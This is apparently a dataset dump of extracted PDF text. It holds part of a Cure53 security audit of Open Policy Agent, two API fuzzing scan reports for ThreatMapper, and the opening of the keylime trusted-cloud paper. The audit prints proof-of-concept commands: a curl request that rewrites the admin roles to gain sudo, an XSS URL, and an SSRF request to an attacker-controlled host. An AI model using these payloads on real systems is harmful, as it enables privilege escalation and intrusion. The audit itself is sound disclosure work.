compression is\nsupported, which led to the DoS finding described under OPA-01-004.\n1 https://github.com/open-policy-agent/opa/blob/master/docs/devel/DEVELOPMENT.md\nCure53, Berlin · 08/30/18 5/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in a chronological order rather than by\ntheir degree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. OPA-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nOPA-01-001 Server: Insecure default config allows bypassing policies (Medium)\nWhen setting up OPA in conjunction with PAM for sudo authorization, in accordance with\nthe documentation2, it became clear that bypassing policy is a possibility. This could, in\nturn, be escalated to root privileges in the default setup. The problem is due to a\nmisconfiguration of the OPA server which allows access to the OPA endpoints. These\ncan then can be abused to corrupt policies or datasets, meaning that a regular user can\ncorrupt the dataset and be granted sudo access.\nFig.: Regular policy check through PAM module and OPA\nThe figure above illustrates the interplay between the host running the PAM module and\nthe OPA server responsible for checking the policies. Under normal circumstances, test\nuser would not be able to execute sudo since the admin group only contains the ops\nuser.\nDue to the fact that OPA does not restrict access to any of its endpoints, an attacker can\nsimply corrupt the dataset and add any user to the admin group. Below is the Proof-of-\nConcept (PoC) command which shows how to achieve this.\n \n2 https://www.openpolicyagent.org/docs/ssh-and-sudo-authorization.html\nCure53, Berlin · 08/30/18 6/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPoC for modifying the admin group:\ncurl -X PUT <opa server ip>:<opa server port>/v1/data/roles -d \\\n'{\n \"admin\": [\"ops\", \"test\"]\n}'\nOnce the dataset has been corrupted, test user obtains a capacity to execute sudo.\nAlthough OPA provides a mechanism to restrict endpoint access3, none of this has been\nmentioned in the tutorial documentation. Unless an administrator explicitly looks for that\ninformation, it is hard to find it and, as a result, its absence potentially leads to insecure\nconfigurations.\nIt is recommended to update the documentation to mention potential security\nimplications and refer to the security documentation linked above. Moreover, the\nimportance of a secure OPA configuration should be stressed because the overall\nsecure deployment of OPA heavily relies on proper configuration and policies. In that\ncontext, a secure-by-default approach should be ideally considered and could signify\nenabling token/basic authentication out of the box with the option to manually disable it if\nnecessary.\nOPA-01-005 Server: OPA query interface vulnerable to XSS (High)\nAfter the analysis of the template files inside the OPA’s web interface, it was noticed\nthat the relevant query interface is vulnerable to simple XSS attacks. This is because\nthe templates of the query form and the query result contain unsanitized user-input. A\nsnippet of the vulnerable code can be seen next.\nAffected File:\nserver/server.go\nAffected Code:\nfunc renderQueryForm(w http.ResponseWriter, qStrs []string, inputStrs []string,\nexplain types.ExplainModeV1) {\n[...]\nfmt.Fprintf(w, `\n<form>\n Query:<br>\n<textarea rows=\"10\" cols=\"50\" name=\"q\"> %s</textarea><br>\n<br>Input Data (JSON):<br>\n<textarea rows=\"10\" cols=\"50\" name=\"input\">%s</textarea><br>\n<br><input type=\"submit\" value=\"Submit\"> Explain:\n3 https://www.openpolicyagent.org/docs/security.html#authentication-and-authorization\nCure53, Berlin · 08/30/18 7/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n<input type=\"radio\" name=\"explain\" value=\"off\" %v>Off\n<input type=\"radio\" name=\"explain\" value=\"full\" %v>Full\n</form>`, query, input, explainRadioCheck[0], explainRadioCheck[1])\n}\n[...]\nfunc renderQueryResult(w io.Writer, results interface{}, err error, t0 \ntime.Time) {\n[...]\nif err != nil {\nfmt.Fprintf(w, \"Query error (took %v): <pre> %v</pre>\", d, err)\n} else if err2 != nil {\nfmt.Fprintf(w, \"JSON marshal error: <pre> %v</pre>\", err2)\n} else {\nfmt.Fprintf(w, \"Query results (took %v):<br>\", d)\nfmt.Fprintf(w, \"<pre>%s</pre>\", string(buf))\n}\n}\nThe vulnerability can also be demonstrated by sending an administrator with local\naccess to OPA to the following URL. Upon a visit to this item, XSS is directly triggered\nat two different locations in the output.\nPoC URL:\nhttp://localhost:8181/?q=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C\n%2Fscript%3E&input=%7B%7D%0D%0A&explain=full\nRendered Response:\n<form>\nQuery:<br>\n<textarea rows=\"10\" cols=\"50\" \nname=\"q\"></textarea><script>alert(1)</script> </textarea><br>\n<br>Input Data (JSON):<br>\n<textarea rows=\"10\" cols=\"50\" name=\"input\">{}\n</textarea><br>\n<br><input type=\"submit\" value=\"Submit\"> Explain:\n<input type=\"radio\" name=\"explain\" value=\"off\" >Off\n<input type=\"radio\" name=\"explain\" value=\"full\" checked>Full\n</form>Query error (took 2.656683ms): <pre>1 error occurred: 1 error occurred: \n1:1: rego_parse_error: no match found\n</textarea><script>alert(1)</script>\nEspecially with vulnerabilities like OPA-01-001, where direct OPA access is required for\na successful exploit, this XSS issue can prove very valuable for attackers seeking an\nadministrator to issue requests on their behalf. It is thus recommended to sanitize all\nuser-input reflected in the rendered HTML pages. As a short-term solution, it is possible\nCure53, Berlin · 08/30/18 8/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nto simply make sure that the reflected values do not contain dangerous characters like\n<,>, \" or '. However, more durable and long-term approach would be to consider an\nHTML sanitizer like bluemonday4, as this is necessary to globally protect all HTML\npages.\nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nOPA-01-002 Server: Query interface can be abused for SSRF (Medium)\nBy default, the OPA server exposes a query interface, therefore allowing to execute\nrego queries by sending a GET request to the given endpoint. It needs to be underlined\nthat rego provides several built-in functions, one of which is called http.send. As the\nname suggests, it sends HTTP requests to a given URL. This built-in function, in\ncombination with the query endpoint, allows an attacker to send requests originating\nfrom the OPA server. As such, it can be used for triggering Server-Side Request Forgery\n(SSRF)5. In other words, the flaw can be leveraged to gain access to internal-only\nservices and this can lead to further attacks.\nAn attacker has full control over the request method, the URL and the request body.\nBelow is a Proof-of-Concept (PoC) command executing curl, which triggers a GET\nrequest being sent to the attacker’s server.\nPoC command:\ncurl 'http://<opa ip>:<opa port>/v1/query?q=http.send (%7B%22method%22%3A%22get\n%22%2C%22url%22%3A%22http%3A%2F%2F <attacker ip>%3A<attacker port>%2F%22%7D%2C\n%20yolo)%0A'\nThe incoming request, depicted for the server, can be found next.\nIncoming request:\n$ nc -lvp 31337\nListening on [0.0.0.0] (family 0, port 31337)\nConnection from [redacted] 57433 received!\nGET / HTTP/1.1\nHost: [redacted]:31337\nUser-Agent: Go-http-client/1.1\n4 https://github.com/microcosm-cc/bluemonday5 https://www.owasp.org/index.php/Server_Side_Request_Forgery\nCure53, Berlin · 08/30/18 9/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAccept-Encoding: gzip\nIt is recommended to either remove the http.send built-in function, or, if that is not\npossible, restrict access to the query endpoint by default. In other words, endpoints\nshould be equipped with access only if explicitly configured to do so. Restricting access\nto the endpoints still makes the risk of having a policy that passes user-input into the\nfunction persistent. This may result in SSRF depending on the handling of that input.\nOPA-01-003 Server: Unintended behavior due to unclear documentation (Medium)\nNote: During the test this issue was discussed with the developers because it was\nunclear whether or not this the observed behavior was intended or indeed comprised a\nlogical flaw. A quick answer from the developers provided Cure53 with a link to an\nalready existing GitHub issue6 which reports on the exact same problem.\nOPA can authenticate and authorize client requests and this is enabled by passing two\narguments through the command line when starting the server daemon. It was\ndiscovered that a token-based authentication is only active in combination with enabled\nauthorization. In essence, when the user enables the token-based authentication without\nenabling the basic authorization, the result is that neither the authentication nor the\nauthorization is active.\nThis behavior is not reflected in the documentation and can therefore lead to insecure\nconfigurations where the user thinks authentication is enabled, even though in fact it is\nnot. What follows is the code responsible for this behavior.\nAffected File:\nopa-master/server/server.go\nAffected Code:\nfunc (s *Server) Init(ctx context.Context) (*Server, error) {\n// Add authorization handler. This must come BEFORE authentication\nhandler\n// so that the latter can run first.\nswitch s.authorization {\ncase AuthorizationBasic:\ns.Handler = authorizer.NewBasic(s.Handler, s.getCompiler, s.store)\n}\nswitch s.authentication {\ncase AuthenticationToken:\ns.Handler = identifier.NewTokenBased(s.Handler)\n6 https://github.com/open-policy-agent/opa/issues/901\nCure53, Berlin · 08/30/18 10/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n}\nThe sole purpose of the authentication handler is to extract a Bearer token from the\nAuthorization HTTP header and pass it as an input parameter for policies. However, the\nactual system policy checking is only performed in the authorization handler.\nIt is recommended to update the documentation to clearly reflect this behavior so that\nmisunderstandings or wrong interpretations can be avoided.\nOPA-01-004 Server: Denial of Service via GZip bomb in bundles (Info)\nOPA can be configured to fetch rules from a remote HTTP server via so-called bundles.\nThe files inside a bundle are tar.gz-compressed. It was discovered that OPA trusts the\napplied compression as it does not establish any potential size limits. This allows to\ncause a Denial of Service (DoS) by providing a bundle file which will consume the\nmemory of the server and therefore crash OPA.\nThis attack requires that an attacker can either MitM the connection between OPA and\nthe remote HTTP server or already has full control over the remote server.\nThe following code snippet is responsible for parsing bundle files. As soon as io.Copy is\nreached, the bundle will be decompressed and the memory exhaustion will be triggered\nAffected File:\nopa-master/bundle/bundle.go\nAffected Code:\n// Read returns a new Bundle loaded from the reader.\nfunc Read(r io.Reader) (Bundle, error) {\ngr, err := gzip.NewReader(r)\ntr := tar.NewReader(gr)\nfor {\nheader, err := tr.Next()\n[...]\nvar buf bytes.Buffer\nio.Copy(&buf, tr)\nIt is recommended to consider replacing io.Copy with io.CopyN7. The latter allows to\nspecify the maximum number of bytes that should be read. By properly defining the limit,\nit can be assured that a GZip compression bomb cannot easily cause a Denial-of-\nService.\n7 https://golang.org/pkg/io/#CopyN\nCure53, Berlin · 08/30/18 11/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nOPA-01-006 Server: Path mismatching via HTTP redirects (Info)\nIt was discovered that variables in policies match and allow \"..\" in path queries. This\ncould introduce security issues in case a developer is not aware of the behavior. As an\nexample, the existing /cars/<car_id> policy was modified to demonstrate the flaw. The\nreceived car_id variable is passed to the built-in http.send function. The standard HTTP\nGo client does not normalize the defined URL. Therefore, \"..\" is used in the HTTP path.\nDepending on the HTTP server listening at example.com, this could trigger a\nnormalization of the path via a HTTP redirect. As the used Go client is configured to\nfollow redirects, this could cause a path mismatch, thus bypassing the logic of the\ndeployed application.\nExample Command:\ncurl \"http://172.31.18.77:8080/cars/ %2e%2e\"\nFile:\nAuthz.rego\nExample Policy:\nallow {\ninput.method = \"GET\"\ninput.path = [\"cars\", car_id]\n# car_id contains \"..\"\nconcat(\"/\",[\"http://example.com\",\"test\", car_id,\"abcd\"],output)\nhttp.send({\"method\":\"get\", \"url\":output}, yolo)\n}\nExample.com HTTP Log:\n\"GET /test/../abcd HTTP/1.1\"\nAffected File:\nOpa-master\\topdown\\http.go\nAffected Code:\nfunc createHTTPClient() {\n[...]\nclient = &http.Client{\n// CheckRedirect not defined\nTimeout: timeout,\n}\nConsideration should be given to preventing potential path traversal issue by disallowing\n\"..\" in rego path variables. In case this is not feasible, Go HTTP client should be used to\ndefine the CheckRedirect property. Support for HTTP redirects needs to be disabled.\nCure53, Berlin · 08/30/18 12/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions\nThe results of this Cure53 security assessment of the OPA compound are positive. With\nthe generous funding from The Linux Foundation/ CNCF, six testers from the Cure53\nproject could spend eighteen days on the test-targets in the OPA scope. Notably, both\npenetration testing and code auditing were performed during this August 2018 project,\nmaking a low number of six findings very praiseworthy against for this rather complex\nframework. This demonstrates that security has been taking center-stage in the\ndevelopment and deployment put forward by the OPA maintainers.\nRight from the start, it needs to be noted that a decision to rely on the Go language\nclearly translated, in a security sense, to very positive outcomes. Vulnerabilities,\nstanding at two, were few and far between, with general issues also coming up to a low\ntotal of four. Paired with that is the cleanly written OPA code, which is easy to read and\ngrasp. All in all, the OPA framework lends itself well to auditing and testing, while also\nachieving good results in terms of robustness and impenetrability.\nThe core application is well-written and made it - together with the Go traits - impossible\nfor any memory corruption attacks to be found during this project. Overall, the attack\nsurfaces of OPA heavily relies on proper configuration, as evidenced by the three early\ndiscoveries (i.e. OPA-01-001, OPA-01-002 and OPA-01-003). Besides the configuration,\nthe integration and interplay between the OPA server/library and the application itself is\nof major importance for security. In this context, flaws in the application that employs the\nOPA framework may lead to exploitable scenarios relevant for the core product,\nspecifically allowing bypasses of the policy checks. It is therefore crucially important to\nalways integrate OPA into an application carefully and with an explicit security focus.\nHaving said that, Cure53 specifically finds that the provided examples of\nimplementations were very minimal and straightforward, which resulted in a small attack\nsurface and absence of security-relevant issues. However, on a broader scale and for\nprojects with greater complexity, it cannot be excluded, or might even be expected, that\napplication-vulnerabilities become more likely and facilitate routes for OPA bypasses.\nWhat is more, the shared documentation was unclear and misleading at times (see\nOPA-01-001), so that arriving at a secure configuration and integration would require a\nuser to have an extensive and nearly-internal-level of knowledge. As people normally\ncannot be expected “to know what to look for”, this poses a risk of insecure\nconfigurations. In Cure53’s view, this is an issue that should be tackled immediately. To\nadd to the documentation realm, tasks like isolating the OPA instance on a network-\nbased level have neither been described or mentioned, although network-based isolation\ncan greatly improve security outcomes.\nCure53, Berlin · 08/30/18 13/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIn a long-term perspective, a more secure-by-default approach should be considered.\nFor example, this could focus on enabling authorization and authentication by default\nunless explicitly configured otherwise. Another proposed solution would be to bind the\nserver to 127.0.0.1 instead of 0.0.0.0, again making the former a default handling.\nAs presented in OPA-01-005, the only web page offered by OPA suffers from XSS. This\nshould be taken as an important warning when creation of further web pages occurs in\nthe future. This warrants considerable attention so that mistakes can be eradicated and\nregressions avoided.\nOverall, Cure53 feels strongly about the OPA framework being fit-for-purpose and\nsecure. While improvements can be made in terms of making documentation more\naccessible for broader audiences and ascertaining that the premise holds in more\ncomplex scenarios, the OPA generally seems to consistently treat security as a top\npriority. Even if the results suggest minor issues that could only be pivotal when\ncombined with future vulnerabilities, addressing them should be seen as surely\nbeneficial. It is believed that capitalizing on the advice furnished through the reported\nCure53’s findings will improve the security of the OPA framework.\nCure53 would like to thank Torin Sandall, Tristan Swadell, Ashutosh Narkar and Tim\nHinrichs from the OPA team as well as Chris Aniszczyk of The Linux Foundation for their\nexcellent project coordination, support and assistance, both before and during this\nassignment. Special gratitude also needs to be extended to The Linux Foundation for\nsponsoring this project.\nCure53, Berlin · 08/30/18 14/14" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-19 22_30_28.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin REST Project 2/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 22:30:28\nTime taken 00:04:54.007\nTotal scans performed: 2189\nIssues found: 3\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 3 3\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest HEAD https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest POST https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod POST\nResponseContent-type: application/json\n535 Content length: \nFull response:\n{\"data\":{\"siddharth-8vcpu-agent\":{\"containers\":{},\"kubernetes_cluster_name\n\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"\n3c6bb1217b3b2388\",\"severity\":null},\"siddharth-8vcpu-console\":{\"containers\"\n:{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\n\":{},\"probe_id\":\"35ccbb56f0e12a5d\",\"severity\":null},\"siddharth-dev-\n8vcpu-agent3\":{\"containers\":{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\"\n:{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"7726d7c69133fbc2\",\"severity\":\nnull}},\"error\":null,\"success\":true}\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #3" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-19 20_00_36.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 20:00:36\nTime taken 00:04:56.923\nTotal scans performed: 2189\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" } ]
{ "category": "Provisioning", "file_name": "tci-acm.pdf", "project_name": "Keylime", "subcategory": "Security & Compliance" }
[ { "data": "Bootstrapping and Maintaining Trust in the Cloud\u0003\nNabil Schear\nMIT Lincoln Laboratory\nnabil@ll.mit.eduPatrick T. Cable II\nThreat Stack, Inc.\npat@threatstack.comThomas M. Moyer\nMIT Lincoln Laboratory\ntmoyer@ll.mit.edu\nBryan Richard\nMIT Lincoln Laboratory\nbryan.richard@ll.mit.eduRobert Rudd\nMIT Lincoln Laboratory\nrobert.rudd@ll.mit.edu\nABSTRACT\nToday's infrastructure as a service (IaaS) cloud environ-\nments rely upon full trust in the provider to secure appli-\ncations and data. Cloud providers do not o\u000ber the ability\nto create hardware-rooted cryptographic identities for IaaS\ncloud resources or su\u000ecient information to verify the in-\ntegrity of systems. Trusted computing protocols and hard-\nware like the TPM have long promised a solution to this\nproblem. However, these technologies have not seen broad\nadoption because of their complexity of implementation, low\nperformance, and lack of compatibility with virtualized en-\nvironments. In this paper we introduce keylime , a scal-\nable trusted cloud key management system. keylime pro-\nvides an end-to-end solution for both bootstrapping hard-\nware rooted cryptographic identities for IaaS nodes and for\nsystem integrity monitoring of those nodes via periodic at-\ntestation. We support these functions in both bare-metal\nand virtualized IaaS environments using a virtual TPM.\nkeylime provides a clean interface that allows higher level\nsecurity services like disk encryption or con\fguration man-\nagement to leverage trusted computing without being trusted\ncomputing aware. We show that our bootstrapping proto-\ncol can derive a key in less than two seconds, we can detect\nsystem integrity violations in as little as 110ms, and that\nkeylime can scale to thousands of IaaS cloud nodes.\n\u0003This material is based upon work supported by the As-\nsistant Secretary of Defense for Research and Engineering\nunder Air Force Contract No. FA8721-05-C-0002 and/or\nFA8702-15-D-0001. Any opinions, \fndings, conclusions or\nrecommendations expressed in this material are those of the\nauthor(s) and do not necessarily re\rect the views of the As-\nsistant Secretary of Defense for Research and Engineering.\nc\r2016 Massachusetts Institute of Technology. Delivered\nto the U.S. Government with Unlimited Rights, as de\fned\nin DFARS Part 252.227-7013 or 7014 (Feb 2014). Notwith-\nstanding any copyright notice, U.S. Government rights in\nthis work are de\fned by DFARS 252.227-7013 or DFARS\n252.227-7014 as detailed above. Use of this work other than\nas speci\fcally authorized by the U.S. Government may vio-\nlate any copyrights that exist in this work.\nACM acknowledges that this contribution was authored or co-authored by an em-\nployee, or contractor of the national government. As such, the Government retains\na nonexclusive, royalty-free right to publish or reproduce this article, or to allow oth-\ners to do so, for Government purposes only. Permission to make digital or hard copies\nfor personal or classroom use is granted. Copies must bear this notice and the full ci-\ntation on the first page. Copyrights for components of this work owned by others than\nACM must be honored. To copy otherwise, distribute, republish, or post, requires prior\nspecific permission and/or a fee. Request permissions from permissions@acm.org.\nACSAC ’16, December 05-09, 2016, Los Angeles, CA, USA\nc\r2016 ACM. ISBN 978-1-4503-4771-6/16/12. . . $15.00\nDOI:http://dx.doi.org/10.1145/2991079.29911041. INTRODUCTION\nThe proliferation and popularity of infrastructure-as-a-\nservice (IaaS) cloud computing services such as Amazon\nWeb Services and Google Compute Engine means more cloud\ntenants are hosting sensitive, private, and business critical\ndata and applications in the cloud. Unfortunately, IaaS\ncloud service providers do not currently furnish the build-\ning blocks necessary to establish a trusted environment for\nhosting these sensitive resources. Tenants have limited abil-\nity to verify the underlying platform when they deploy to\nthe cloud and to ensure that the platform remains in a good\nstate for the duration of their computation. Additionally,\ncurrent practices restrict tenants' ability to establish unique,\nunforgeable identities for individual nodes that are tied to a\nhardware root of trust. Often, identity is based solely on a\nsoftware-based cryptographic solution or unveri\fable trust\nin the provider. For example, tenants often pass unprotected\nsecrets to their IaaS nodes via the cloud provider.\nCommodity trusted hardware, like the Trusted Platform\nModule (TPM) [40], has long been proposed as the solution\nfor bootstrapping trust, enabling the detection of changes to\nsystem state that might indicate compromise, and establish-\ning cryptographic identities. Unfortunately, TPMs have not\nbeen widely deployed in IaaS cloud environments due to a\nvariety of challenges. First, the TPM and related standards\nfor its use are complex and di\u000ecult to implement. Second,\nsince the TPM is a cryptographic co-processor and notan\naccelerator, it can introduce substantial performance bottle-\nnecks (e.g., 500+ms to generate a single digital signature).\nLastly, the TPM is a physical device by design and most\nIaaS services rely upon virtualization, which purposefully\ndivorces cloud nodes from the hardware on which they run.\nAt best, the limitation to physical platforms means that\nonly the cloud provider would have access to the trusted\nhardware, not the tenants [17, 20, 31]. The Xen hypervisor\nincludes a virtualized TPM implementation that links its se-\ncurity to a physical TPM [2, 10], but protocols to make use\nof the vTPM in an IaaS environment do not exist.\nTo address these challenges we identify the following de-\nsirable features of an IaaS trusted computing system:\n\u000fSecure Bootstrapping { the system should enable\nthe tenant to securely install an initial root secret into\neach cloud node. This is typically the node's long term\ncryptographic identity and the tenant chains other se-\ncrets to it to enable secure services.\n\u000fSystem Integrity Monitoring { the system should\nallow the tenant to monitor cloud nodes as they oper-ate and react to integrity deviations within one second.\n\u000fSecure Layering (Virtualization Support) { the\nsystem should support tenant controlled bootstrapping\nand integrity monitoring in a VM using a TPM in the\nprovider's infrastructure. This must be done in collab-\noration with the provider in least privilege manner.\n\u000fCompatibility { the system should allow the ten-\nant to leverage hardware-rooted cryptographic keys in\nsoftware to secure services they already use (e.g., disk\nencryption or con\fguration management).\n\u000fScalability { the system should scale to support boot-\nstrapping and monitoring of thousands of IaaS resources\nas they are elastically instantiated and terminated.\nPrior cloud trusted computing solutions address a subset\nof these features, but none achieve all. Excalibur [31] sup-\nports bootstrapping at scale, but does not allow for system\nintegrity monitoring or o\u000ber full support for tenant trusted\ncomputing inside a VM (i.e., layering). Manferdelli et al.\ncreated a system that supports secure layering and boot-\nstrapping, but does not support system integrity monitor-\ning, is incompatible with existing cryptographic services,\nand has not demonstrated cloud scale operation [25]. Fi-\nnally, the Cloud Veri\fer [34] enables system integrity mea-\nsurement and cloud scalability but does not fully address\nsecure layering or enable secure bootstrapping.\nIn this paper, we introduce keylime ; an end-to-end IaaS\ntrusted cloud key management service that supports all the\nabove desired features. The key insight of our work is to\nutilize trusted computing to bootstrap identity in the cloud\nand provide integrity measurement to support revocation,\nbut then allow high-level services that leverage these iden-\ntities to operate independently. Thus, we provide a clean\nand easy to use interface that can integrate with existing\nsecurity technologies (see Figure 1).\nWe introduce a novel bootstrap key derivation protocol\nthat combines both tenant intent and integrity measurement\nto install secrets into cloud nodes. We then leverage the\nCloud Veri\fer [34] pattern of Schi\u000bman et al. to enable pe-\nriodic attestation that automatically links to identity revo-\ncation. keylime supports the above with secure layering in\nboth bare-metal and virtualized IaaS resources in a manner\nthat minimizes trust in the cloud provider. We demonstrate\nthe compatibility of keylime by securely enabling cloud pro-\nvisioning with cloud-init1, encrypted communication with\nIPsec, con\fguration management with Puppet2, secret man-\nagement with Vault3, and storage with LUKS/dm-crypt en-\ncrypted disks. Unlike existing solutions [39, 25], these ser-\nvices don't need to be trusted computing aware, they just\nneed to use an identity key and respond to key revocations.\nFinally, we show that keylime can scale to handle thou-\nsands of simultaneous nodes and perform integrity checks\non nodes at rates up to 2,500 integrity reports (quotes) ver-\ni\fed per second. We present and evaluate multiple options\nfor deploying our integrity measurement veri\fer both in the\ncloud, in a low-cost cloud appliance based on a Raspberry\nPi, and on-premises. We show that the overhead of securely\n1http://launchpad.net/cloud-init\n2http://puppetlabs.com/\n3http://hashicorp.com/blog/vault.html\nTPM / Platform Manufacturer Enrollment Software-based Cryptographic Services Software ID Keys ID key revoked? KeylimeTrusted Computing Services Signed EKs Valid TPM? Figure 1: Interface between trusted hardware and\nexisting software-based security services via the\nkeylime trusted computing service layer.\nprovisioning a key using keylime takes less than two sec-\nonds. Finally, we \fnd that our system can detect integrity\nmeasurement violations in as little as 110ms.\n2. BACKGROUND\nTrusted Computing The TPM provides the means for\ncreating trusted systems that are amenable to system in-\ntegrity monitoring. The TPM, as speci\fed by the Trusted\nComputing Group (TCG)4, is a cryptographic co-processor\nthat provides key generation, protected storage, and crypto-\ngraphic operations. The protected storage includes a set of\nPlatform Con\fguration Registers (PCRs) where the TPM\nstores hashes. The TPM uses these registers to store mea-\nsurements of integrity-relevant components in the system.\nTo store a new measurement in a PCR, the extend opera-\ntion concatenates the existing PCR value with the new mea-\nsurement, securely hashes5that value, and stores the result-\ning hash in the register. This hash chain allows a veri\fer to\ncon\frm that a set of measurements reported by the system\nhas not been altered. This report of measurements is called\nanattestation , and relies on the quote operation, which ac-\ncepts a random nonce and a set of PCRs. These PCRs can\ninclude measurements of the BIOS, \frmware, boot loader,\nhypervisor, OS, and applications, depending on the con\fgu-\nration of the system. The TPM reads the PCR values, and\nthen signs the nonce and PCRs with a key that is only ac-\ncessible by the TPM. The key the TPM uses to sign quotes\nis called an attestation identity key ( AIK ). We denote a\nquote using Quote AIK(nonce; PCR i:di:::) for a quote us-\ningAIK from the TPM with the associated nonce and one\nor more optional PCR numbers PCR iand corresponding\ndata dithat will be hashed and placed in PCR i.\nThe TPM contains a key hierarchy for securely storing\ncryptographic keys. The root of this hierarchy is the Stor-\nage Root Key (SRK) which the owner generates during TPM\ninitialization. The SRK in turn protects the TPM AIK (s)\nwhen they are stored outside of the TPM's nonvolatile stor-\nage (NVRAM). Each TPM also contains a permanent cre-\ndential called the Endorsement Key ( EK). The TPM man-\nufacturer generates and signs the EK. The EK uniquely\nidenti\fes each TPM and certi\fes that it is a valid TPM\nhardware device. The private EK never leaves the TPM,\nis never erased, and can only be used for encryption and\ndecryption during AIK initialization to limit its exposure.\n4http://trustedcomputinggroup.org\n5TPM speci\fcation version 1.2 uses SHA-1 for measure-\nments. TPM speci\fcation version 2.0 adds SHA-256 to ad-\ndress cryptographic weaknesses in SHA-1.Integrity Measurement To measure a system component,\nthe underlying component must be trusted computing-aware .\nThe BIOS in systems with a TPM supports measurement of\n\frmware and boot loaders. TPM-aware boot loaders can\nmeasure hypervisors and operating systems [22, 19, 29]. 